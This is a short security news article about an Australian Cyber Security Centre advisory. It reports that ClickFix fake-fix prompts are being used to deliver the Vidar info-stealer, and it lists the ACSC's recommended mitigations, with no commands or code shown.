Australia Warns of ClickFix Attacks Spreading Vidar Stealer

The Australian Cyber Security Centre (ACSC) has issued a high‑priority advisory warning that a sophisticated malware campaign is actively using the ClickFix social‑engineering technique to deliver Vidar Stealer, a known info‑stealing payload. The campaign has been observed targeting Australian enterprises and government entities, though similar activity has been reported across other regions.

ClickFix lures victims by displaying fake error dialogs or update prompts on compromised websites and malicious emails. Users are instructed to copy and run a short PowerShell command to “fix” the issue, which in reality downloads and executes the Vidar Stealer loader. This method eliminates the need for exploit kits and relies on human error, making it particularly effective against poorly patched systems.

Once installed, Vidar Stealer harvests a broad range of sensitive data, including browser history, saved credentials, cryptocurrency wallet files, and documents stored on the infected host. The malware exfiltrates the stolen data to attacker‑controlled command‑and‑control (C2) servers, often using encrypted HTTP traffic to evade network detection.

The ACSC recommends immediate mitigations: enforce software patching, disable macro execution in office applications, restrict PowerShell execution through Applocker or policy controls, and deploy endpoint detection and response solutions capable of identifying anomalous script activity. Organizations are also urged to conduct user awareness training to prevent employees from falling for ClickFix prompts and to report any suspicious artefacts to the ACSC for timely threat intelligence sharing.